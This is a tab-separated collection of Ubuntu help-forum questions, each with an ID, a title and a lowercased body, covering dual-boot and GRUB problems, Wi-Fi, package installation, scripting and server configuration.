351714	ca n't boot windows or ubuntu !	i recently dual booted my sony vaio having pre-installed windows 8 with ubuntu 12.04 using a livecd , and ubuntu worked fine . ( i had done the needful as seen in installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) and ubuntu was working perfectly ) by the way , i had pre-partitioned my windows c : drive and during booting i just selected `` install ubuntu along with windows 8 '' and did not ask for any partitioning ! . after installation , i even got the option to select windows or ubuntu during startup but windows would n't boot on being selected . so i selected 'boot repair ' as shown in the link ( using recommended settings and all ) . an option came there to remove grub and reinstall it . everything went fine and i rebooted only to find : grub loading error : invalid arch independent elf magic grub rescue > on typing ls i get points like ( hdx , gpty ) . i have found my file lies in ( hd0 , gpt12 ) but insmod linux does not work . on starting with my livecd , nothing happens , i can not boot from it and i get the previous screen only . please help !
351715	how to extend my hard disk into a second hard disk ?	i have two hard disks on my computer , both of which are running ubuntu ( different versions ) . one of them is about to run out of disk space , and i want to get partition some of the second hard disk to use as an extension to the former . is this possible , and if so , how can i do this ?
351719	how to start an application with bottom most property ?	i want to start an application with bottom-most property . that means that the window will remain always in the bottom of the other windows . is this possible ? i think that there must be an application that does such a thing , but i have not idea how to find it ... for example , i want to start chromium-browser with bottom most property . how can i do that ?
351721	clamav continues to say that my definitions are outdated	i have just updated the definitions for clamav and here is the output : clamav update process started at mon sep 30 09:22:24 2013 warning : your clamav installation is outdated ! warning : local version : 0.97.8 recommended version : 0.98 do n't panic ! read http : //www.clamav.net/support/faq main.cvd is up to date ( version : 55 , sigs : 2424225 , f-level : 60 , builder : neo ) daily.cld is up to date ( version : 17915 , sigs : 385323 , f-level : 63 , builder : neo ) bytecode.cvd is up to date ( version : 226 , sigs : 43 , f-level : 63 , builder : neo ) i have checked if i have any other version of clamav installed , and i do n't think i have two instances installed : whereis freshclam freshclam : /usr/bin/freshclam /usr/bin/x11/freshclam /usr/share/man/man1/freshclam.1.gz whereis clamscan clamscan : /usr/bin/clamscan /usr/bin/x11/clamscan /usr/share/man/man1/clamscan.1.gz ldd which freshclam which : ldd : ./which : no such file or directory freshclam : ldd : ./freshclam : no such file or directory kindly help .
351724	using ms programs in ubuntu	i like most computer users , have many windows based programs . can these be operated under ubuntu and if so what is required . thanks for your help chris
351725	how do i install .pkg files ?	a private bank has its net-banking facility provided with a software . only when i install the software i will be able to use the facility . now they have different versions of the software for windows and mac . there is no separate version for linux . is it possible to install a .pkg file ( which is intended for mac ) in ubuntu ?
351726	how to disable the drop shadow effect at the edge of windows in gnome shell ?	here is : i try to find in gnome-tweak-tool , but i have no luck . i 'm using gnome shell v3.8.3 on ubuntu gnome 13.04 .
351729	issues installing ubuntu on fresh hard drive	hard drive crashed on my 4+ year-old laptop . decided to try ubuntu 12.04 desktop instead of reinstalling vista . installed a new 500 gb drive in the laptop , and booted using a newly created ubuntu flash drive . used gparted to create a single ext4 partition . rebooted , then tried the `` install to hard drive '' option that came up during the boot process . i got a btrfs message , then a checksumming message , then a series of repeating `` asking for cache data failed '' and `` assuming drive cache : write through '' messages . can anyone tell me what these messages mean ? how do i get past this problem ?
351738	access folders on windows using ubuntu	i recently had a problem accessing a windows machine using ubuntu . i followed the advice using the solution from this answer : access windows machines from ubuntu on local network by hostname this worked out perfectly . i can now access the windows machine . my new problem is that when i click on a folder , let 's say music , it shows up being empty . the folder contains files , but ca n't viewed on the ubuntu machine . question : how do i view these files ?
351739	ca n't install rvm	i want to install rvm : ubuntu @ ext : ~ $ rvm the program 'rvm ' is currently not installed . you can install it by typing : sudo apt-get install ruby-rvm ubuntu @ ext : ~ $ sudo apt-get install ruby-rvm reading package lists ... done building dependency tree reading state information ... done e : unable to locate package ruby-rvm how can i do it ?
351740	ubuntu 12.04 wo n't install from dvd/cd , from bootable usb , or from hard drive ... looking for network connection ? why ?	ubuntu claims it will install without a network connection . however on a system i have previously installed ubuntu on with an older version , i now get error in the installation log file debug downloader http : //cdimage.ubuntu.com/precise/wubi/current/i386.tar.xz ... followed by a failure to load the file . so , if ubuntu is able to install without a network connection , then why is it failing when trying to get a file over the network ? why is it trying to download a file when there is no network connection ?
351744	extracting url links from a file	following code is to extract /support/security/bulletins/*.html links from a file ( urlfile contain about 1000 links ) to urlsort file using regex , but i 'm weak in regex can anyone show me how to do that ... ? # ! /usr/bin/env python import re , sys filehandle = open ( 'urlfile ' , 'r ' ) f1 = open ( 'urlsort ' , 'w ' ) for line in filehandle.readlines ( ) : links = re.findall ( r '' ( \/support\/security\/bulletins\/*.html.* ? ) '' , line ) for link in links : sys.stdout = f1 print ( ' % s ' % ( link [ 0 ] ) ) sys.stdout = sys.__stdout__ f1.close ( ) filehandle.close ( )
351752	wifi not appearing on my list	so here 's my problem : i have an asus rt-g32 wifi router that i am using for my connection and when i 'm at home i can connect from ubuntu , windows 8 & my cyanogenmod 10.1.3 galaxy s4 ... .when i 'm at college ( i am on the same provider , made contract with them , i live on a rent ) my windows 8 sees the wifi and connects to it , my android sees the connection but does n't connect to it and ubuntu does n't even see it.a week ago i tested this with another router asus rt-n10e and the problem was the same ( then i thought it was from the router ) but now i 'm running out of ideeas . help please ? ? ?
351755	mbr not found error during installation	i am completely new to linux/ubuntu but i want to learn it . recently my hd crashed so i bought a new ssd and installed windows on the c drive . i have my normal stuff on d drive and want to install ubuntu on the e drive which is 65 gb . when i tried to install ubantu from usb , i got an error that mbr is missing . can anyone please help me with it or point me in the right direction . thanks a lot . looking forward to have fun with ubuntu : )
351756	low wireless range on ubuntu 13.04	i put ubuntu 13.04 on my asus s300ca . the issue is with the wireless . the range is much smaller than on windows . i have 10+ feet range from the router on wireless , then on ubuntu i have about 3 feet before it becomes unstable , 5 feet and it does n't even see the router . is there any way to increase power to the card or increase the range of the card ? thank you . i used to the command sudo iwconfig wlan0 txpower 25 to increase the transmission power from 10 dbm to 25 dbm ( until i was able to get a signal ) and it seems to have a stronger connection . does anyone know how much we can push it before the card becomes unstable ? edit : this command stopped working . i do that , then it keeps resetting itself back down to 10 dbm .
351757	how to capture serial logs for virtual box android x86 platform	i am trying to compile a androidx86 kernel provided by google for jellybean filesystem , while running i want to capture the serial logs , as it will help me in debugging.can some one help me in this . i used the socat mechanism but how do i redirect this socket to a file .
351761	ubuntu 12.04 lts not restarting to finish installation	so i have installed ubuntu 12.o4.3 lts from a cd . everything went fine , but i noticed after sometime using the it , it still has n't told me that the installation is complete nor ask me to restart/reboot ubuntu to finish the installation . and there is no shutdown and logout button , only suspend . i am currently on a lenovo y410p intel® core™ i7-4700mq cpu @ 2.40ghz × 8 i just got it so their should be no problems regarding the hardware .
351763	sd mounting in my sony xperia l	i have recently bought a sony xperia l and when i insert my sd card it does n't mount . nothing shows that there is a memory card inserted , thus the files do not appear and yet in other phones the card shows.i do n't know whether it 's because the sd has a password . please help : -/
351765	bash - 'if ' statement : compare two strings	i would like to make a script that deletes a directory with rmdir after confirming with a password using read to set the variable . so far i have this : # ! /bin/bash -x echo `` password : '' read -t 30 s1 s2='55555' if [ $ s1= $ s2 ] ; then rmdir /home/william/test else echo `` fail '' sleep 10 fi so , i have the -x to try to debug it but every time the script either fails to echo ( if i put the password in wrong ) or it wont remove the directory needed . if someone has a modifiable script that i could use or if you could point out the problems with the current script that would be great .
351767	how to crop borders/white spaces from image ?	i have a lot of images which have white borders around it . i would like to crop those borders in one batch , preferably from command line . i believe that it can be done with imagemagick , but i could n't find suitable command . i know that it can be done with windows program named irfanview with `` auto crop borders '' option , but i am looking for ubuntu-based and preferably command line based solution .
351770	how to install linux-tools-3.5.0-030500	i installed kernel 3.5 from mainline using the procedure avaliable at http : //ubuntuforums.org/showthread.php ? p=11391743 # post11391743 but when i tried to install perf , its asking for linux-tools-3.5.0-030500 when i tried to install it , only linux-tools-3.5.0-23,25 ... ..41 are avaliable how can i install perf ?
351774	how do i install garena messenger and league of legends in ubuntu 12.04 ?	i have been trying time and time again but they have to be installed separately so they do not work . additionally , i can not get it to patch so i ca n't start the pvp.net client . i have been trying to do it using playonlinux since wine is way too complicated to a noob like me . please answer as if you are talking to someone who is very familiar with windows but has just decided to switch to linux for stability . thanks !
351778	automatic security update fails by unmet dependency	ubuntu 12.04 - update manager failed to install security update of some headers . i have tried : sudo apt-get -f install which tries to get dependencies , but initially fails with : dpkg : error processing /var/cache/apt/archives/linux-headers-3.2.0-54_3.2.0-54.82_all.deb followed by many more errors including : no space left on device which is completely rubbish as there is more than 120 gb of space . questions : can i fix this problem ? if not , can i at least remove the faulty update so i can get the apt-get and the update manager working again ? many thanks .
351779	espeak stopped working	i am executing an infinite loop application in which i am using the espeak utility to produce audio output . it works really fine for an hour , but after this it stops working , and also does not produce any error in the console . i know that this problem is due to espeak only because the rest of the program does its job correctly , still output is ok , but espeak is not working : it does n't produce output like before . here is how i am using espeak ( the problem is really because of an infinite loop . due to this espeak stops working . the rest of the code is running perfectly . ) : system ( `` espeak -ven-us+f3 -- stdout 'please do registration ' -a 300 -s 130 | aplay '' ) ;
351783	zenbook ux31a , install complete but canâ´t boot into linux	first , i wan na make clear that i am not talking about the installation problem , every zenbook-user seems to have . my zenbook came with win7 preinstalled but i upgraded it to win 8 ( which i dont really like ) . here are the steps i done so far : created bootable usb-stick with ubuntu 13.04 plugged in the stick and startet ( without pressing anything ) . i direcly came to the menu , where i can choose to install or try ubuntu . i installed ubuntu twice : 1st time manually - i created 80gb ext4 partition + 4gb swap ) . 2nd time i tried to install automaticly as `` alongside windows 8 ) both led to the same result : i cant start ubuntu , no matter whcih keys i press during startup . only win8 boots . in bios i cant choose boot prioritys because there is only one ( sata 256gb or something like that ) . but under win8 i can see the ubuntu-partition + swap . i read something about grub ? what is that ? do i need it and how do i get it ? greez and so much thx !
351786	python : error during generation of xml file from python dictionary	importerror : no module named elementtree.simplexmlwriter the code : import xml.etree.celementtree as et root = et.element ( `` root '' ) doc = et.subelement ( root , `` doc '' ) field1 = et.subelement ( doc , `` field1 '' ) field1.set ( `` name '' , `` blah '' ) field1.text = `` some value1 '' field2 = et.subelement ( doc , `` field2 '' ) field2.set ( `` name '' , `` asdfasd '' ) field2.text = `` some vlaue2 '' tree = et.elementtree ( root ) tree.write ( `` filename.xml '' ) can anyone help ?
351788	lid switch on notebook stopped working after update . how can i fix it ?	the lid switch of the notebook lenovo thinkpad x230i had worked just fine : closing the lid lead to a suspend as expected . after an update of the system on the 18th of september1 the lid switch seems to be not recognized anymore . if i manually click on `` suspend '' , it works fine , so suspending is not the core of the problem . i tried to read the `` lid '' state , by entering while [ 1 ] ; do cat /proc/acpi/button/lid/lid/state ; sleep 1 ; done in the terminal and also by trying watch -n 4 'upower -d | grep lid- ' , but the reported lid state is always `` open '' . my strong assumption is that the lid switch did not physically break at the same time when i did the update . also , the notebook is just three weeks old . is there a way that i can fix the correct reading of the lid state in ubuntu ? thanks a lot for your help ! the log of the update 18th sept is here .
351790	what application for illustrated story telling ?	i am working on a project with kids to make them narrate and illustrate their own tale on a digital format . there will be several illustrated pages and an audio files of themselves narrating the story . i looked in to libre office impress , but the embedded audio or audio transitions do n't seem to work and there is n't an easy solution to this it seems . what alternative application do i have to make this project ?
351793	accessing a windows 's network behind it 's vpn from ubuntu	we access client 's network through a citrix vpn connection . for some wired reason , ubuntu box is not able to connect to the vpn . it works fine for mac and windows users . we had tried to solve the issue , but in vein . so a suggestion given was to set up a windows machine , connect it to client 's vpn and access the client network from my ubuntu box , through the windows machine . could anyone help with connecting the ubuntu box to the windows box , to access the network behind it 's vpn connection .
351794	samba share on ubuntu with linux vm	i have an ubuntu local machine and an ubuntu vm . i have tried to share my web root folder with my local machine , using virtualbox share folder , but ca n't get it up . now i want to install samba and use it as a network drive rather than a share , i have a bridge connection already , but not sure how to . so on which ubuntu do i install samba , local or vm , and how do i add it on the other one ?
351795	kernel panic vaio s13 -- -keybord & touchpad not work	i downloaded and saved from the official website ubuntu 12.04 lts , first i tried it on my tower and i tried it smoothly and then install it , today i tried it on my sony vaio what i have done has been this , 1-boot windows7 insert the cd , 2 - off and on again , i ripped the grub and gave me three options . 1-try to run without install 2-install and 3-detect errors , i gave the ( 1 ) to try and enter , i appeared the following message : [ 0.984117 ] kernel panic - not syncing : vfs : unable to mount root fs on block ( 0,0 ) and two lights lit keyboard , the blok capitalized . and blok des now the keyboard does not work and every time you start the two keyboard lights are on , everything starts normally but there is no way to operate the keyboard . neither the bios works . i have just installed windows7 i have no ubuntu installed . everything works as if nothing had happened but the keyboard and touchpad do not respond to anything but i can use a keyboard and a mouse if i connect them by usb .
351796	openstack on maas error when upload images	ubuntu @ node-4 : ~/openstack $ cloud-publish-tarball ./ubuntu-12.04-beta1-server-cloudimg- > amd64.tar.gz images mon sep 30 09:18:20 utc 2013 : ====== extracting image ====== warning : no ramdisk found , assuming ' -- ramdisk none' kernel : precise-server-cloudimg-amd64-vmlinuz-virtual ramdisk : none image : precise-server-cloudimg-amd64.img mon sep 30 09:18:36 utc 2013 : ====== bundle/upload kernel ====== failed to upload bundle to images/precise-server-cloudimg-amd64-vmlinuz-virtual.manifest.xml failed : euca-upload-bundle -- bucket images -- manifest /tmp/cloud-publish-image.erhmyu/precise-server-cloudimg-amd64-vmlinuz-virtual.manifest.xml s3_url not specified . trying http : //localhost:8773/services/walrus checking bucket : images [ errno 111 ] connection refusedfailed to upload kernel how to fix it ?
351798	remote computing	how can i remote login from an ubuntu machine via an another ubuntu machine to get the maximum speed ? i tried to use teamviewer , but it 's very slow . vnc also has issues . please let me know about which software to use and the process to use it .
351799	brother mfc-295cn installation help needed	i am a complete newbie to linux and ubuntu . so i need step by step help please . i am running ubuntu 13.04 and i have no clue how to install my printer . i am sick of windows and want to run ubuntu only , but right now i have to dual boot with windows so i have access to my printer . printer is a brother mfc-295cn , and i want to install basic way by usb-not network . i have looked at other questions about this but i do n't understand how to install packages or use terminal commands . so a step by step help is what i need . thanks in advance for any help .
351800	wifi on lenovo n581 blocks other wifi clients	i have a problem with the wifi on my new lenovo ideapad n581 : the wifi works after installing the additional drivers , but when i switch it on all other computers connected to our wifi router ( the french freebox ) , i have no internet access anymore . if i boot windows it works fine . the card is a broadcom bcm4313 802.11bgn , the driver shown by lsmod is cfg80211 or wl .
351803	how to make dsl connection auto start on boot	i am trying to make ubuntu server to auto-connect a dsl connection but it does n't work . i 've tried this solution but it does n't work . any other solutions ?
351805	make file error	common/packet.cc : in static member function 'static int p_info : :addpacket ( char* ) common/packet.cc:54:13 : error : assignment of read-only variable 'pt_ntype' make : *** [ common/packet.o ] error i get this error when changes were made for a new protocol and after making changes until makefile .. i run the command `` touch common/packet.cc '' and its compiling.. but when i run the command `` make '' the above error occurs.. kindly can anyone help me ?
351806	dual boot - windows games on ubuntu	on my windows xp 's pc i have two partitions - local disc `` c '' which is made for os and disc `` d '' which is made for games and programs . so here goes my question : if i install ubuntu on local disc `` d '' will i be able to use windows xp games and programs on ubuntu or is it going to erase all the data ? another question : if i want to install on local disc `` d '' should i use wubi installer ( or what was is it called ? ) or should i install manually from bios ? here goes my third question : if i decide to shrink size of disc `` d '' and from that left-over create disc `` e '' with purpose of storing ubuntu on it will i retain access to disc `` d '' and all the data ( games and programs ) that is stored on that disc ? p.s . i 'm moving to ubuntu because it is programmer-friendly os ( also very user-friendly when compared to other linux distros ) and because microsoft stops supporting xp in april 2014 and windows 7 in january of 2015 in order to encourage people to buy useless windows 8 . their shooting their foot with this decision .
351807	how to install jdk 7u25 & netbeans ide 7.3.1 on ubuntu 13.04 ?	i have downloaded jdk-7u25-nb-7_3_1-linux-x64.sh and netbeans-7.3.1-linux.sh . i installed jdk ( which is bundle with netbeans base ide ) using sudo sh jdk-7u25-nb-7_3_1-linux-x64.sh i chose the installation folder to /opt/jdk_xxx/ and /opt/netbeans_xxx/ ( i really wish not to install the program to the home directory ) , after the installation i do n't see any shortcut to lunch the netbeans ide . i also tried to install netbeans ide ( full package ) using sudo sh jdk-7u25-nb-7_3_1-linux-x64.sh but after the installation i still do n't see the shortcut of the program , i also do n't know how to create the shortcut by myself . what to do next ? or have i done anything wrong ? thanks .
351808	using a variable inside `sed` command	i am using this command to copy certain line from one file to another.its working fine.no issue with it . sed -f < ( sed -e '1,10d ; 12 , $ d ; x ; s/ . */10a\/ ; p ; x ' ../log/file2.txt ) ../log/file4.txt > ../log/file5.txt the problem is instead of 10 , i want to use variable var1 ( where var1=10 ) . the $ var1 is not working . i tried this command : sed -f < ( sed -e '1 , $ var1d ; 12 , $ d ; x ; s/ . */10a\/ ; p ; x ' ../log/file2.txt ) ../log/file4.txt > ../log/file5.txt please help me .
351809	ubuntu raring on imac 2008 ; graphics update ati radeon hd 2600 pro broke my raring this morning !	was working on my imac ( 2008 ) 20,5 '' this morning when again some glx etc updates appeared ! as usual i let the update-installer do it 's job ; when finished updating , my screen got scrambled ; i can not work anymore as the screen shivers , shakes and graphics is one big mess . ctrl+alt+f1 does not work either as most of the time my screen is black completely ! when booting into osx 10.8.5 ( raring dual boot with osx 10.8.5 ) , osx graphics works flawlessly ! can anybody indicate me which ati radeon drivers i can download which repairs the 'malversation ' of this mornings updates ? i guess i will have to startup with some rescue boot disk ( knoppix ? ) to do manipulationsâś as i 'm still a noob as well i need clear explanations ( please ) . raring worked perfectly in dual boot on my imac until this mornings updates ! needles to say the 'final resort ' is restarting ( re ) installation of ubuntu raring , but want to attempt to rescue my present 13.04 . thank you ! kind regards , gaytan !
351813	unity not showing every application open	i am running ubuntu 13.04 and i 've noticed that unity never shows every single application that is open . for example , if i view a pdf the viewer is not on the dash and not even in the alt+tab list ; the thing is , if i minimize all the other apps , i can get to the pdf . so , what am i doing wrong ?
351815	opengl , error of failed request : badrequest	i compiled http : //lazyfoo.net/tutorials/opengl/02_matrices_and_coloring_polygons/index.php with command g++ lutil.cpp main.cpp -lgl -lglu -lglut -o outexe , but then i run it , the output is x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 154 ( glx ) minor opcode of failed request : 34 ( ) serial number of failed request : 34 current serial number in output stream : 33 what does this mean ?
351823	can not remove nuvola player 1.0.5	i have tried purge and removal commands as well as complete removal from packages but this version will just not go away . it now says when i try to remove from the command line that the software is not installed and so no need to remove . i do n't know what the problem is . i read that it might be because it was installed from a zip file . help would be appreciated . thanks .
351827	unable to run a 32-bit program on 64-bit vm	i compiled a small `` hello world '' c program on ubuntu 10.04 32 bit machine . then i put the executable ( a.out ) on ubuntu 12.10 ( 64 bit ) vmware virtual machine and tried to execute it ( ./a.out ) . the os does not identify the file and says 'no such file or directory ' . but when i put the same executable on a ubuntu 12.10 ( 64 bit ) running on a 64 bit laptop , it runs fine and i get the desired output . the vm is running on ibm blade servers . i wanted to know why the results for a vm ?
351829	visudo crashing on making changes	i am attempting to add an entry to visudo : admin all= ( all ) /bin/kill i have attempted to make changes to this in the past but crashed the visudo file . can someone assist in telling me where exactly the command above should be placed ?
351830	taking screenshot using python	the below code work perfectly when i run it as a console application import gtk.gdk import time w = gtk.gdk.get_default_root_window ( ) sz = w.get_size ( ) print `` the size of the window is % d x % d '' % sz pb = gtk.gdk.pixbuf ( gtk.gdk.colorspace_rgb , false,8 , sz [ 0 ] , sz [ 1 ] ) pb = pb.get_from_drawable ( w , w.get_colormap ( ) ,0,0,0,0 , sz [ 0 ] , sz [ 1 ] ) ts = time.time ( ) filename = `` screenshot '' filename += str ( ts ) filename += `` .png '' if ( pb ! = none ) : pb.save ( filename , '' png '' ) print `` screenshot saved to `` +filename else : print `` unable to get the screenshot . '' but now i when i used it in a ubuntu application ( using the quickly and glade ) it is giving me error messages warning ** : could n't connect to accessibility bus : failed to connect to socket /tmp/dbus-o1o56xxlha : connection refused /usr/lib/python2.7/dist-packages/gobject/constants.py:24 : warning : g_boxed_type_register_static : assertion `g_type_from_name ( name ) == 0 ' failed import gobject._gobject /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : specified class size for type `pygtkgenericcellrenderer ' is smaller than the parent type 's `gtkcellrenderer ' class size from gtk import _gtk /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : g_type_get_qdata : assertion `node ! = null ' failed from gtk import _gtk how can i improve this code to work in gui based application edit what i have done to change the code from gi.repository import gdk , gdkx11 , gtk w = gdk.get_default_root_window ( ) geo = w.get_geometry ( ) pb = gdkpixbuf.pixbuf.new ( gdkpixbuf.colorspace.rgb , false,8 , geo [ 2 ] , geo [ 3 ] ) pb = pb.gdk_pixbuf_get_from_window ( w,0,0 , geo [ 2 ] , geo [ 3 ] ) pixbuf = pb.get_from_drawable ( w , w.get_colormap ( ) ,0,0,0,0 , geo [ 2 ] , geo [ 3 ] ) pixbuf.save ( `` xdfgxfdgdfxgfdx.png '' , '' png '' ) print `` the size of the window is % d x % d '' % sz pix = gdkpixbuf.pixbuf.gdk_pixbuf_get_from_window ( root_window , 0 , 0 , 500 , 500 ) pix = gdkpixbuf.gdk_pixbuf_get_from_window ( window,0,0,500,500 ) ; ts = time.time ( ) filename = `` screenshot '' filename += str ( ts ) filename += `` .png '' if ( pix ! = none ) : pix.save ( filename , '' png '' ) print `` screenshot saved to `` +filename else : print `` unable to get the screenshot . '' but still it is giving me error ( 0 , 0 , 1366 , 768 ) < pixbuf object at 0x2966410 ( gdkpixbuf at 0x2e42d90 ) > traceback ( most recent call last ) : file `` /home/srs/projectob-team/projectob_team/selectmemodialog.py '' , line 63 , in on_start_clicked pb = pb.gdk_pixbuf_get_from_window ( w,0,0 , geo [ 2 ] , geo [ 3 ] ) attributeerror : 'pixbuf ' object has no attribute 'gdk_pixbuf_get_from_window'
351831	installing ubuntu , when booting goes into busybox	i 'm a total newbie to linux so please be generous , but i 've installed it successfully on my work desktop ( on university network ) using the windows installer ( windows 7 ) , but on my laptop ( most important as much more powerful machine ) when i choose ubuntu rather than windows to boot , it takes me straight to what looks like a dos screen but is called busybox . why is this , and does anyone know how i would then get to actually booting up ubuntu ? thanks - sorry if this has an obvious answer , all pointers gratefully received .
351832	colormake not working properly	i 'm having a problem to use colormake ( 1 ) ( 2 ) . first i installed it with apt-get and try to compile my makefile , but what i got , was n't colourized properly . in other words , colors are changed , but they are all grey : then i download everything from the author website and tried to copy manually everything to \usr\bin by cp -fa colormake.pl colormake colormake-short clmake clmake-short /usr/bin/ and yet i have exactly the same results . what i 'm doing wrong here and how can i tackle the problem ?
351836	mblaze configuration on ubuntu 12.04	hi i am trying to connect to connect mblaze in ubuntu 12.04 , but device is not visible in system
351838	system hangs on logout on ubuntu 12.04	if i login on my ubuntu pc and logout immediately , the system sometimes hangs . the background screen and icons are displayed and i can even use the mouse to activate the icons and launch programs , but the logout does not proceed - the system appears to be stuck . there is one workaround : if i hit ctrl-alt-delete , i 'm asked if i want to logout and told that the system will log me out in 60 seconds . this workaround is fine from me , but the freeze is somewhat confusing for my users . does anyone know what causes this and how to avoid it ? my guess is some kind of timing issue with unity , but that is only a guess . any suggestions are appreciated .
351839	webapps on chrome - not chromium - with ubuntu 13.04	i 've been trying to find some info on this , but i only got very confusing or old pages . i simply would like to know if i can use the webapps on my chrome ( version 29.0.1547.76 ) with ubuntu 13.04
351840	please help , mounting other partitions on startup	these are my all partitions . this is my /etc/fstab i would like to auto mount sda3 ( ntfs ) , sda6 ( ext4 ) , sda7 ( ext4 ) on startup , please help me edit the /etc/fstab file . i 've searched for gui way of doing this but i can not find pysdm on the software center . thanks . edited ! ! ! i 've edited fstab as shown in the picture , i got error during booting , please help me find out what went wrong . p.s . i 've created /mnt/extdisk1 , i copied and pasted the uuid so it was not misspelling .
351844	polipo https authentication problem	i use internet behind http proxy , and that requires authentication . i tried using polipo to bypass the authenticated proxy to 127.0.0.1:9134 . applying these settings to my browser , works fine for http : //examplewebsite.com but for https : //examplewebsite.com , it asks for authentication . also my host proxy authentication does not work in the authentication dialog . settings i have changed in my /etc/polipo/config proxyport=9134 parentproxy = `` 172.31.1.10:8080 '' parentauthcredentials = `` username : mypassword ''
351848	windows 8 not launching after grub selection	i recently installed windows 8 and ubuntu 12.04 in my new asus 550jv ; i honestly ran into a ton of trouble but finally managed to have both oss running properly . or so i thought ; after much tinkering ( i was having some issues with some gpt/mrb partition conflicts during installation as well as the uefi ) i successfully got my computer to launch the grub bootloader , and the bootloader recognizes both my ubuntu os and my windows os . the issue is that when i choose to launch windows 8 , nothing happens . the screen goes black , then lights up to a light purple colour ( which looks like the default ubuntu os colour ) and stays stuck there . i tried launching boot-repair from a usb key but i run into the same problem . i feel that somehow ( due to the colour of the screen ) ubuntu is still trying to load regardless of what choice i make on the grub bootloader ... would anyone have any idea how i could solve this ? thanks in advance for your help .
351849	screen fade to black after 10 minutes and never come back	im using linaro raring server for cubieboard a20 from here : www.cubieforums.com/index.php ? topic=807.0 after about 10 minutes , the screen goes to black , even i 'm using keyboard or mouse , so seems not be a screensaver to me , since not idle . nothing i can do brings the screen back again , only a reboot . my system still alive ( my tv shows signal is active ) . i 'm not using gui , so answer in terminal commands . i do n't use gui , but have a x11 , because xbmc is installed on system . at startup , xbmc starts without login . steps i 've done : 1 ) start system and xbmc . auto login ( root ) . black screen after 10 min even using keyboard/mouse . 2 ) start without xbmc ( and gui ) . auto login ( root ) . black screen after 10 min even using keyboard/mouse . tried this https : //bugs.launchpad.net/ubuntu/+source/xorg-server/+bug/1072531 and this how to stop screen going black after 10 min i do n't have xset and ca n't find where xorg.conf is . there is a x11 in init folder . xbmc is using framebuffer .
351850	warning : the partition is misaligned by xxx - revisiting this question	i know this has been addressed , but i still have a question : i recently bought a wd 4tb green hard drive to use as one of my data backups . i made a single partition using guid instead of mbr . my gui version of dist utility that came with my version of linux ubuntu 12.04lts ) is reporting the partition misalignment by 3072 bytes . my reading on the forums seems to indicate that if i used guid partitioning , i do n't need to worry about the partition misalignment , that it 's irrelevant . obviously , i do n't know much about what i 'm doing with disk partitioning and formatting , and i do n't know much more about linux , other than it 's been an exceptional os for my needs . anyway , i am hoping that someone with more knowledge and experience can comment and tell me if the above assumption is correct , or if i need to go back and re-align the partition .
351852	how to ( if possible ) create a ssl certificate for only one website on my apache2 server ?	i saw some similar posts like this , but it did n't help me at my exact problem . so i am using ubuntu 12.04 on a server with apache2 on it . there are like 5 websites which are virtualhosts and namebased running on it ( using the same port ) . now i need another page whiche requires a ssl certificate . is it possible to run just the one page under ssl or do i automatically load everything in it when i configure ssl ? i know that i have to put the ssl server under port 443 like this : < virtualhost *:443 > sslengine on sslcertificatefile /path/to/your/sslcert documentroot /path/your/webcontent < /virtualhost > does anyone know and want to explain me , how to setup ssl for just one page ?
351858	touchpad and parts of keyboard frozen after boot on macbook	i 'm experiencing an issue where , after booting a macbookair4-2 ( ubuntu 13.04 ) , the touchpad wo n't work . furthermore , the better part of the keyboard does n't work either . external usb keyboards and mouses work , and i have to use them to disable and re-enable the trackpad in the settings to get the on-laptop one to work , which also enables the keyboard for some reason . i do not experience any issues during the refind menu or in os x . is there a way to fix this or a script that i can run at startup that can enable and disable the touchpad ?
351859	can not find windows 8 option in grub menu after installing 13.04	i 've installed ubuntu 13.04 in a separate partition of my hard drive which also has windows 8 in another partition . the problem is , grub menu is not showing windows 8 os to boot into . so if i want to boot into windows then i must go into boot priority and change boot order . what should i do to get windows 8 option in grub menu ? also i can not access other partitions of the hard drive where windows is installed , similarly can not access ubuntu partition when using windows . ( i found similar question in this section but did not understand it as i 'm new to this platform . )
351862	extracting specific data in a file using regex	following info i want to extract from a file which has different version , release date , cve number . can anyone show me how to retrieve that information using regex.. ? sorry if this is a terrible question , i can just never grasp regex . release date : march 13 , 2007 vulnerability identifier : apsb07-07 cve number : cve-2007-1278 platform : windows only
351864	partition a usb memory stick	i 'm trying to partition a 16gb memory stick so both partitions can be seen by windows . i 've created 2 partitions , 500 mb and 15.5 gb both fat323 . but windows only sees the 1st .
351867	cups-pdf stops working after reboot on ubuntu 13.04	my pdf virtual printer installed via sudo apt-get install cups-pdf normally generates pdf files in ~/pdf directory . however , after reboot , it does n't work anymore . jobs appear to be 'cancelled ' in localhost:631 . if i make : sudo dpkg -p cups-pdf and then sudo apt-get install cups-pdf , it works again ! ! ! can someone suggest me a way to solve this annoying problem ? thanks , pier
351870	ca n't open .eps files in gimp 2.8 ( ubuntu 13.04 )	everything was working fine in ubuntu 12.04 , i upgraded my system and now gimp wo n't open .eps files : opening ' ... /fnostim.eps ' failed : could not interpret postscript file ' ... /fnostim.eps' ps : yes , i have ghostscript installed . pps : those .eps files are plots generated via matlab , in cmyk color space .
351871	mysql 5.5 on 10.04 version	is it is possible to install mysql 5.5 standalone aka ( not .deb ) file into ubuntu 10.04
351874	how to clear old update installation files ?	i recently got a warning , that i only have 5.8mb free space in my /boot directory . this information came with the option to 'examine or ignore it ' . i examined the file and could n't do anything , so i decided to close it . after receiving a notification that an update was available , i clicked upgrade but it said that i did n't have space in that /boot directory , so i looked up hundreds of websites , but could n't find a solution . after clicking on something by mistake on the update screen , it gave me a code to paste in terminal to clear my old updates . i closed it after copying , but it did n't paste and i could never find that code again ) i 've downloaded synaptic package manager and it did n't help , but i really need that code . please help - thanks !
